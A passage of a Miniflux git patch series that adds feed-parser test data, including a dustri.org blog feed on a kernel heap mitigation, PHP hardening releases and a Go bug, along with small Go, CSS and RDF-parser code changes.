+magic human-assisted smart diffing to detect user-perceived/perceivable
+breakages. </p>
+<p>The paper is full of fancy graphs and analysis, but the <a href="https://en.wikipedia.org/wiki/TL;DR">tldr</a> is:</p>
+<blockquote>
+<p>We discover that 43 % of web pages are not strictly dependent on JavaScript
+and that more than 67 % of pages are likely to be usable as long as the visitor
+only requires the content from the main section of the page, for which the user
+most likely reached the page, while reducing the number of tracking requests by
+85 % on average.</p>
+</blockquote>
+<p>An interesting take is that the usage of javascript frameworks is the main
+source of breakage, since <s>a lot</s> all of them result in completely
+unusable websites when javascript is disabled. Moreover, anecdotal data seems
+to suggest that the bigger a company is, the more their website is going to
+break when javascript is disabled.</p>
+<p>And like every decent paper, it comes with the <a href="https://gitlab.inria.fr/Spirals/breaking-bad">related code and data published</a>.</p>jvoisinTue, 26 Sep 2023 17:15:00 +0200tag:dustri.org,2023-09-26:/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.htmlpaper_notesSnuffleupagus 0.10.0 - Babar the Elephanthttps://dustri.org/b/snuffleupagus-0100-babar-the-elephant.html<p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
+<p>I just published a new release of
+<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
+the hardening module for php7+ and php8+,
+version <code>0.10.0</code>, codename "Babar the Elephant",
+named after the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
+The main new feature is the PHP8.3 support, but there are a couple of
+quality-of-life improvements for people using Snuffleupagus with fuzzers as
+well.</p>
+<h3>Changelog</h3>
+<ul>
+<li>Compatibility with PHP8.3</li>
+<li>Add <code>sp.log_max_len</code> to limit the maximum size of the log messages</li>
+<li>Add an example configuration for Xenforo 2.2.12 </li>
+<li>Url encode functions arguments when logging them</li>
+<li>Fix a possible NULL-byte truncation when outputting parameters in the logs</li>
+<li>Make <code>readonly_exec</code> play nice on readonly filesystems </li>
+</ul>
+<p>As usual, if you want to help, we have some
+<a href="https://github.com/jvoisin/snuffleupagus/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22">low hanging fruits</a> ♥</p>
+<p>See you in your PHP stack!</p>jvoisinWed, 20 Sep 2023 15:25:00 +0200tag:dustri.org,2023-09-20:/b/snuffleupagus-0100-babar-the-elephant.htmlphpSome notes on "Randomized slab caches for kmalloc()"https://dustri.org/b/some-notes-on-randomized-slab-caches-for-kmalloc.html<p>Ruiqi Gong and Xiu Jianfeng got their
+<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
+patch series merged upstream, and I've had enough discussions about it to
+warrant summarising them into a small blogpost.</p>
+<p>The main idea is to have multiple slab caches, and pick one at random based on
+the address of code calling <code>kmalloc()</code> and a per-boot seed, to make heap-spraying harder.
+It's a great idea, but comes with some shortcomings for now:</p>
+<ul>
+<li>Objects being allocated via wrappers around <code>kmalloc()</code>, like <code>sock_kmalloc</code>,
+ <code>f2fs_kmalloc</code>, <code>aligned_kmalloc</code>, … will end up in the same slab cache.</li>
+<li>The slabs need to be pinned, otherwise an attacker could <a href="https://en.wikipedia.org/wiki/Heap_feng_shui">feng-shui</a> their way
+ into having the whole slab free'ed, garbage-collected, and have a slab for
+ another type allocated at the same VA. <a href="https://thejh.net/">Jann Horn</a> and <a href="https://infosec.exchange/@nspace">Matteo Rizzo</a> have a <a href="https://github.com/torvalds/linux/compare/master...thejh:linux:slub-virtual-upstream">nice
+ set of patches</a>,
+ discussed a bit in <a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">this Project Zero blogpost</a>,
+ for a feature called <a href="https://github.com/torvalds/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e"><code>SLAB_VIRTUAL</code></a>,
+ implementing precisely this.</li>
+<li>There are 16 slabs by default, so one chance out of 16 to end up in the same
+ slab cache as the target.</li>
+<li>There are no guard pages between caches, so inter-caches overflows are
+ possible.</li>
+<li>As pointed out by <a href="https://twitter.com/andreyknvl/status/1700267669336080678">andreyknvl</a>
+  and <a href="https://infosec.exchange/@minipli/111045336853055793">minipli</a>,
+  fewer allocations hitting a given cache means less noise,
+ so it might even help with some heap feng-shui.</li>
+<li>minipli also pointed out that "randomized caches still freely
+ mix kernel allocations with user controlled ones (<code>xattr</code>, <code>keyctl</code>, <code>msg_msg</code>, …).
+ So even though merging is disabled for these caches, i.e. no direct overlap
+ with <code>cred_jar</code> etc., other object types can still be targeted (<code>struct
+ pipe_buffer</code>, BPF maps, its verifier state objects,…). It’s just a matter of
+ probing which allocation index the targeted object falls into.",
+ but I considered this out of scope, since it's much more involved;
+ albeit something like Jann Horn's <a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README"><code>CONFIG_KMALLOC_SPLIT_VARSIZE</code></a>
+ wouldn't significantly increase complexity.</li>
+</ul>
+<p>Also, while code addresses as a source of entropy have historically been a great
+way to provide <a href="https://lwn.net/Articles/569635/">KASLR</a> bypasses, <code>hash_64(caller ^
+random_kmalloc_seed, ilog2(RANDOM_KMALLOC_CACHES_NR + 1))</code> shouldn't trivially
+leak offsets.</p>
+<p>The segregation technique is a bit like a weaker version of grsecurity's
+<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">AUTOSLAB</a>,
+or a weaker kernel-land version of
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>,
+but to be fair, making use-after-free exploitation harder, and significantly
+harder once pinning lands, with only ~150 lines of code and negligible
+performance impact is amazing and should be praised. Moreover, I wouldn't be
+surprised if this was backported in <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's KernelCTF</a>
+soon, so we should see if my analysis is correct.</p>jvoisinMon, 11 Sep 2023 01:45:00 +0200tag:dustri.org,2023-09-11:/b/some-notes-on-randomized-slab-caches-for-kmalloc.htmlsecurityMaking use of pygments' filters with Pelicanhttps://dustri.org/b/making-use-of-pygments-filters-with-pelican.html<p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
+more or less since the beginning of this blog and I'm still
+pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
+it is, and its complete absence of fundamental changes throughout the years.</p>
+<p>Anyway, I was looking at how to reduce the size of the pages of my blog
+and looked at how code is syntactically highlighted:
+Pelican is using <a href="https://pygments.org">Pygments</a> to do this,
+and looking at its documentation, the <a href="https://pygments.org/docs/filters/#TokenMergeFilter">TokenMergeFilter</a>
+should help a bit, by merging tokens of the same type together,
+instead of highlighting them separately.</p>
+<p>Pelican's documentation <a href="https://docs.getpelican.com/en/stable/settings.html">says</a>
+that options can be passed to python-markdown like this:
+<code>MARKDOWN = { 'extension_configs': { 'markdown.extensions.codehilite': {'css_class': 'highlight'} } }</code>.</p>
+<p>Looking at <a href="https://python-markdown.github.io/">python-markdown</a>'s <a href="https://python-markdown.github.io/reference/#markdown">one</a>,
+one can pass various things as parameters, but it doesn't mention filters.
+<a href="https://pygments.org/docs/filters/">Pygments documentation on this topic</a> implies
+that the only way to add filters is to use the <code>add_filter</code> method on a lexer.</p>
+<p>But <a href="https://github.com/pygments/pygments/blob/master/pygments/lexer.py">looking at the code</a>
+as suggested <a href="https://github.com/Python-Markdown/markdown/issues/1322#issuecomment-1453911760">here</a>,
+filters can be passed like any other options, meaning that one only needs to
+add the following code into the <code>pelicanconf.py</code> file to use the
+<code>TokenMergeFilter</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">pelican</span> <span class="kn">import</span> <span class="n">TokenMergeFilter</span>
+
+<span class="n">MARKDOWN</span> <span class="o">=</span> <span class="p">{</span>
+ <span class="s1">'extension_configs'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'markdown.extensions.codehilite'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'filters'</span><span class="p">:</span> <span class="p">[</span><span class="n">TokenMergeFilter</span><span class="p">()]</span>
+ <span class="p">}</span>
+ <span class="p">}</span>
+<span class="p">}</span><span class="err">`</span><span class="o">.</span>
+</code></pre></div>
+
+<p>Totally worth the effort for a marginal page size reduction!</p>jvoisinFri, 01 Sep 2023 18:30:00 +0200tag:dustri.org,2023-09-01:/b/making-use-of-pygments-filters-with-pelican.htmlwebBook review: Hacks, Leaks, and Revelationshttps://dustri.org/b/book-review-hacks-leaks-and-revelations.html<p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
+<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
+telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
+by <a href="https://micahflee.com/">Micah Lee</a>
+was available in <em>early access</em>, and that they'd be happy to send me an ebook
+copy free of charge!</p>
+<p>From the couple of interactions I had with him, Lee is not only a great human being,
+but also technically literate. He's the director of information security
+at <a href="https://theintercept.com/staff/micah-lee/">The Intercept</a>, and the person
+behind <a href="https://onionshare.org/">OnionShare</a> and <a href="https://dangerzone.rocks/">DangerZone</a>;
+so I was thrilled to finally get my hands on his book!</p>
+<p>And what a great one it is! It's a complete course for everyone who wants to learn how to properly deal with and report on large data sets like leaks:
+How to communicate with sources along with some notions of <a href="https://en.wikipedia.org/wiki/Operations_security">opsec</a>,
+some words on the ethics of dealing with this kind of data,
+how to get data leaks and how to analyse them
+properly and safely, wrangling tools like
+<a href="https://github.com/freedomofpress/dangerzone">dangerzone</a>,
+a <a href="https://en.wikipedia.org/wiki/BitTorrent">BitTorrent</a> client,
+<a href="https://signal.org">Signal</a>,
+<a href="https://torproject.org">Tor</a> via the <a href="https://www.torproject.org/download/">Tor Browser</a> and
+<a href="https://onionshare.org/">Onionshare</a>,
+some <a href="https://en.wikipedia.org/wiki/Linux">linux</a> and <a href="https://en.wikipedia.org/wiki/Shell_(computing)">shell</a> basics,
+a crash course into data analysis with <a href="https://python.org">Python</a> and <a href="https://en.wikipedia.org/wiki/SQL">SQL</a>,
+the <a href="https://occrp.org/en">OCCRP</a>'s <a href="https://docs.aleph.occrp.org/">Aleph</a>,
+…
+with hands-on exercises and reporting examples based on real leaks like
+<a href="https://en.wikipedia.org/wiki/2021_Epik_data_breach">EpikFail</a>,
+<a href="https://en.wikipedia.org/wiki/BlueLeaks">BlueLeaks</a>,
+the <a href="https://apnews.com/article/oath-keepers-leaked-membership-rolls-2ca4195ed3a10e45dd189bf98f3e5a26">Oath Keepers leak</a>,
+<a href="https://discordleaks.unicornriot.ninja/discord/">Unicorn Riot's DiscordLeaks</a>,
+<a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">AFLDS</a>,
+he <a href="https://www.databreaches.net/heritage-foundation-wasnt-attacked-they-leaked-their-own-data/">Heritage Foundation emails</a>,
+…</p>
+<p>It's a comprehensive yet highly digestible resource that I would wholeheartedly
+recommend to anyone remotely interested by modern journalism practises. Hacked
+and dumped databases are all around the internet, waiting to be analysed, reported on,
+contextualised and exposed, and with this book, anyone could help with
+the effort of making the world a better place: sunlight is the best
+disinfectant!</p>jvoisinWed, 16 Aug 2023 16:15:00 +0200tag:dustri.org,2023-08-16:/b/book-review-hacks-leaks-and-revelations.htmlbook_reviewsmat2 0.13.4https://dustri.org/b/mat2-0134.html<p>There is a new minor version of mat2:
+<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
+changes, only minor improvements, code modernisation and a bit of hardening:</p>
+<ul>
+<li>Add documentation about mat2 on OSX</li>
+<li>Make use of python3.7 constructs to simplify code</li>
+<li>Use moderner type annotations</li>
+<li>Harden <code>get_meta</code> in archive.py against variants of <a href="https://cve.circl.lu/cve/CVE-2022-35410">CVE-2021-35410</a></li>
+<li>Improve MSOffice document support</li>
+<li>Package the manpage on PyPI.</li>
+</ul>
+<p>Thanks to <a href="https://anelki.net/">akierig</a>, mat2 is now <a href="https://github.com/macports/macports-ports/pull/18072">available</a> in <a href="https://trac.macports.org/">macports</a>!</p>
+<p>As usual, if you know some python help is
+<a href="https://0xacab.org/jvoisin/mat2/issues?label_name%5B%5D=good+first+issue">welcome</a>.</p>jvoisinWed, 02 Aug 2023 21:30:00 +0200tag:dustri.org,2023-08-02:/b/mat2-0134.htmlmetadataA sneaky Golang bughttps://dustri.org/b/a-sneaky-golang-bug.html<p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
+duplicates from a slice, and thus wrote something like this using the
+<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
+<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
+<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Can you spot the bug? Here are the prototypes of the two functions:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">SortFunc</span><span class="p">[</span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">x</span><span class="w"> </span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span>
+<span class="kd">func</span><span class="w"> </span><span class="nx">CompactFunc</span><span class="p">[</span><span class="nx">S</span><span class="w"> </span><span class="o">~</span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">s</span><span class="w"> </span><span class="nx">S</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span><span class="w"> </span><span class="nx">S</span>
+</code></pre></div>
+
+<p>The first has no return value, while the second does, unused in our case, hence
+the bug. It's <em>interesting</em> to note that the go compiler is perfectly happy
+with this, and doesn't issue any warning: it was <em>extraordinarily fun</em> to pinpoint.</p>
+<p>I reached out to <a href="https://airs.com/ian/">Ian Lance Taylor</a> who
+<a href="https://cs.opensource.google/go/x/exp/+/03df57b9a50843fbf23bf90375d6584bcc8ea13d">implemented</a>
+those functions in 2021 and he pointed me to <a href="https://go.dev/blog/slices-intro">Go Slices: usage and internals
+</a>. Things indeed do become obvious once
+looking at the <a href="https://github.com/golang/go/blob/master/src/runtime/slice.go">implementation of
+<code>slice</code></a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">type</span><span class="w"> </span><span class="nx">slice</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">array</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span>
+<span class="w"> </span><span class="nx">len</span><span class="w"> </span><span class="kt">int</span>
+<span class="w"> </span><span class="nx">cap</span><span class="w"> </span><span class="kt">int</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Both <code>slices.SortFunc</code> and <code>slices.CompactFunc</code> are taking a slice as
+parameter, and not a pointer to a slice, meaning that any changes to <code>len</code> and
+<code>cap</code> will be local to the function.</p>
+<p>Anyway, There is a <a href="https://github.com/golang/go/issues/20803">proposal</a> to require
+return values to be explicitly used or ignored open since 2017, but it didn't
+go anywhere for now. There is also <a href="https://github.com/golang/go/issues/20148">another proposal</a>
+to make <code>go vet</code> better at highlighting error mishandling, as well as <a href="https://github.com/kisielk/errcheck">errcheck</a>,
+but those wouldn't really help in this case.</p>jvoisinWed, 02 Aug 2023 13:15:00 +0200tag:dustri.org,2023-08-02:/b/a-sneaky-golang-bug.htmldev
\ No newline at end of file
diff --git a/internal/reader/parser/testdata/small_atom.xml b/internal/reader/parser/testdata/small_atom.xml
new file mode 100644
index 00000000..3af7b03d
--- /dev/null
+++ b/internal/reader/parser/testdata/small_atom.xml
@@ -0,0 +1,396 @@
+
+
+ tag:github.com,2008:/miniflux/v2/commits/main
+
+
+ Recent Commits to v2:main
+ 2024-03-12T05:30:27Z
+
+ tag:github.com,2008:Grit::Commit/6d97f8b4582414b6ce69467656824690057d4793
+
+
+ Parse podcast categories
+
+ 2024-03-12T05:30:27Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Parse podcast categories</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/f8e50947f2885047155a8070dddab133a5c685c2
+
+
+ Move iTunes and GooglePlay XML definitions to their own packages
+
+ 2024-03-12T05:09:31Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Move iTunes and GooglePlay XML definitions to their own packages</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/9a637ce95e05459adc4712027e6a07eaabcfe657
+
+
+ Refactor RSS parser to use default namespace
+
+ 2024-03-12T04:07:13Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Refactor RSS parser to use default namespace
+
+This change avoid some limitations of the Go XML parser regarding XML namespaces</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/d3a85b049b14d4a4ddd6b813134b2abd45fe5e8d
+
+
+ jsminifier: set JavaScript version
+
+ 2024-03-12T02:02:52Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>jsminifier: set JavaScript version</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/5bcb37901c60463b27e1211e0f68295f213b19e6
+
+
+ Use crypto.GenerateRandomBytes instead of doing it by hand
+
+ 2024-03-11T23:31:43Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Use crypto.GenerateRandomBytes instead of doing it by hand
+
+This makes the code a bit shorter, and properly handle
+cryptographic error conditions.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/9c8a7dfffe2f4596dcbde2c923a7539914bb252f
+
+
+ Make use of HashFromBytes everywhere
+
+ 2024-03-11T22:22:22Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Make use of HashFromBytes everywhere
+
+It feels a bit silly to have a function and to not make use of it.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/74e4032ffc9faad4fec602f283a32d2af8dec47e
+
+
+ Small refactor of app.js
+
+ 2024-03-11T22:18:57Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Small refactor of app.js
+
+- replace a lot of `let` with `const`
+- inline some `querySelectorAll` calls
+- reduce the scope of some variables
+- use some ternaries where it makes sense
+- inline one-line functions</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/fd1fee852cb35fa0f5b0ed6dc0c23b4a6ce368c3
+
+
+ Simplify DomHelper.getVisibleElements
+
+ 2024-03-11T22:03:00Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Simplify DomHelper.getVisibleElements
+
+Use a `filter` instead of a loop with an index.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/c51a3270da1f6af796b7d23fa4b434ccf11818e7
+
+
+ GitHub Actions: Add basic ESLinter checks
+
+ 2024-03-11T03:57:27Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>GitHub Actions: Add basic ESLinter checks</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/45fa641d26a5f68e663aa9af72e97523d8d63c1e
+
+
+ Fix JavaScript linter path in GitHub Actions
+
+ 2024-03-11T03:37:18Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Fix JavaScript linter path in GitHub Actions</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/fd8f25916b025a92b1b8349ef9d0acdb832a9e8e
+
+
+ First steps towards trusted-types support
+
+ 2024-03-11T03:14:30Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>First steps towards trusted-types support
+
+Refactor away some trival usages of `.innerHTML`. Unfortunately, there is no way to
+enabled trusted-types in report-only mode via `<meta>` tags, see
+https://github.com/w3c/webappsec-csp/issues/277</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/826e4d654f511ea8d1d385bdc09cbed69ff6a70f
+
+
+ Replace DomHelper.findParent with .closest
+
+ 2024-03-11T03:06:54Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Replace DomHelper.findParent with .closest
+
+See https://developer.mozilla.org/en-US/docs/Web/API/Element/closest</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/d9d17f0d69d1dafb3bd9d81bf9fc27df3def4f4c
+
+
+ Use a `Set` instead of an array in a KeyboardHandler's member
+
+ 2024-03-11T02:41:13Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Use a `Set` instead of an array in a KeyboardHandler's member
+
+The variable `triggers` is only used to check if in contains a particular
+value. Given that the number of keyboard shortcuts is starting to be
+significant, let's future-proof the performances and use a `Set` instead of an
+`Array` instead.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/eaaeb68474ff194f682e9521a848d7ab2c89348e
+
+
+ Fix conditions to publish packages in GitHub workflows
+
+ 2024-03-10T19:25:13Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Fix conditions to publish packages in GitHub workflows</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/382885f14403526adfa6c303927889c76fd5a1eb
+
+
+ Update changeLog
+
+ 2024-03-10T17:50:47Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Update changeLog</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/0f7b047b0a81253b6d146e05d561545303016b74
+
+
+ Bump github.com/go-jose/go-jose/v3 from 3.0.1 to 3.0.3
+
+ 2024-03-08T04:59:42Z
+
+
+ dependabot
+ https://github.com/dependabot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Bump github.com/go-jose/go-jose/v3 from 3.0.1 to 3.0.3
+
+Bumps [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) from 3.0.1 to 3.0.3.
+- [Release notes](https://github.com/go-jose/go-jose/releases)
+- [Changelog](https://github.com/go-jose/go-jose/blob/v3.0.3/CHANGELOG.md)
+- [Commits](https://github.com/go-jose/go-jose/compare/v3.0.1...v3.0.3)
+
+---
+updated-dependencies:
+- dependency-name: github.com/go-jose/go-jose/v3
+ dependency-type: indirect
+...
+
+Signed-off-by: dependabot[bot] <support@github.com></pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/a074773e6c5d3b2066094cbac0502094aa364713
+
+
+ Use an io.ReadSeeker instead of an io.Reader to parse feeds
+
+ 2024-03-07T04:13:39Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Use an io.ReadSeeker instead of an io.Reader to parse feeds
+
+This will allow to make use of func (*Reader) Seek, instead of re-recreating a
+new reader. It's a large commit for a small change, but anything to simply the
+reader/buffer/ReadAll/… mess is a step in the right direction I think, and it
+should enable more follow-up simplifications.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/3d0126be0b8a603401b7593250f80b0a8042b995
+
+
+ Speed the sanitizer up a bit, again
+
+ 2024-03-06T03:31:50Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Speed the sanitizer up a bit, again
+
+- allow youtube urls to start with `www`
+- use `strings.Builder` instead of a `bytes.Buffer`
+- use a `strings.NewReader` instead of a `bytes.NewBufferString`
+- sprinkles a couple of `continue` to make the code-flow more obvious
+- inline calls to `inList`, and put their parameters in the right order
+- simplify isPixelTracker
+- simplify `isValidIframeSource`, by extracting the hostname and comparing it
+ directly, instead of using the full url and checking if it starts with
+ multiple variations of the same one (`//`, `http:`, `https://` multiplied by
+ ``/`www.`)
+- add a benchmark</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/eda2e2f3f5c278e44e2def72caedc33667a0fb6c
+
+
+ Bump golang.org/x/oauth2 from 0.17.0 to 0.18.0
+
+ 2024-03-05T23:39:07Z
+
+
+ dependabot
+ https://github.com/dependabot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Bump golang.org/x/oauth2 from 0.17.0 to 0.18.0
+
+Bumps [golang.org/x/oauth2](https://github.com/golang/oauth2) from 0.17.0 to 0.18.0.
+- [Commits](https://github.com/golang/oauth2/compare/v0.17.0...v0.18.0)
+
+---
+updated-dependencies:
+- dependency-name: golang.org/x/oauth2
+ dependency-type: direct:production
+ update-type: version-update:semver-minor
+...
+
+Signed-off-by: dependabot[bot] <support@github.com></pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/111e3f2106646cd29f7f74c0102f2a570c598e2e
+
+
+ Reuse a Reader instead of copying to a buffer when parsing an atom feed
+
+ 2024-03-05T01:36:10Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Reuse a Reader instead of copying to a buffer when parsing an atom feed</pre>
+
+
+
diff --git a/internal/reader/subscription/finder.go b/internal/reader/subscription/finder.go
index 74123195..b3ba290b 100644
--- a/internal/reader/subscription/finder.go
+++ b/internal/reader/subscription/finder.go
@@ -69,7 +69,7 @@ func (f *SubscriptionFinder) FindSubscriptions(websiteURL, rssBridgeURL string)
}
// Step 1) Check if the website URL is a feed.
- if feedFormat := parser.DetectFeedFormat(f.feedResponseInfo.Content); feedFormat != parser.FormatUnknown {
+ if feedFormat, _ := parser.DetectFeedFormat(f.feedResponseInfo.Content); feedFormat != parser.FormatUnknown {
f.feedDownloaded = true
return Subscriptions{NewSubscription(responseHandler.EffectiveURL(), responseHandler.EffectiveURL(), feedFormat)}, nil
}
From ee3486af6662660f2d833eda43b4b9bbf4296277 Mon Sep 17 00:00:00 2001
From: mcnesium
Date: Tue, 12 Mar 2024 14:44:12 +0100
Subject: [PATCH 03/80] align min-width with the other min-width values
---
internal/ui/static/css/common.css | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/internal/ui/static/css/common.css b/internal/ui/static/css/common.css
index c3d79f59..aa107d12 100644
--- a/internal/ui/static/css/common.css
+++ b/internal/ui/static/css/common.css
@@ -281,7 +281,7 @@ a:hover {
}
/* Hide the logo when there is not enough space to display menus when using languages more verbose than English */
-@media (min-width: 625px) and (max-width: 830px) {
+@media (min-width: 620px) and (max-width: 830px) {
.logo {
display: none;
}
From 6bc4b35e383f515526d2cd9805d67ce4c43a87f7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Tue, 12 Mar 2024 20:31:08 -0700
Subject: [PATCH 04/80] Refactor RDF parser to use an adapter
Avoid tight coupling between `model.Feed` and the original XML RDF feed.
---
internal/reader/dublincore/dublincore.go | 20 +-
internal/reader/rdf/adapter.go | 115 +++++
internal/reader/rdf/parser.go | 6 +-
internal/reader/rdf/parser_test.go | 586 ++++++++++++++---------
internal/reader/rdf/rdf.go | 125 +----
5 files changed, 480 insertions(+), 372 deletions(-)
create mode 100644 internal/reader/rdf/adapter.go
diff --git a/internal/reader/dublincore/dublincore.go b/internal/reader/dublincore/dublincore.go
index fd4b4911..18c1265d 100644
--- a/internal/reader/dublincore/dublincore.go
+++ b/internal/reader/dublincore/dublincore.go
@@ -3,29 +3,13 @@
package dublincore // import "miniflux.app/v2/internal/reader/dublincore"
-import (
- "strings"
-
- "miniflux.app/v2/internal/reader/sanitizer"
-)
-
-// DublinCoreFeedElement represents Dublin Core feed XML elements.
-type DublinCoreFeedElement struct {
- DublinCoreCreator string `xml:"http://purl.org/dc/elements/1.1/ channel>creator"`
+type DublinCoreChannelElement struct {
+ DublinCoreCreator string `xml:"http://purl.org/dc/elements/1.1/ creator"`
}
-func (feed *DublinCoreFeedElement) GetSanitizedCreator() string {
- return strings.TrimSpace(sanitizer.StripTags(feed.DublinCoreCreator))
-}
-
-// DublinCoreItemElement represents Dublin Core entry XML elements.
type DublinCoreItemElement struct {
DublinCoreTitle string `xml:"http://purl.org/dc/elements/1.1/ title"`
DublinCoreDate string `xml:"http://purl.org/dc/elements/1.1/ date"`
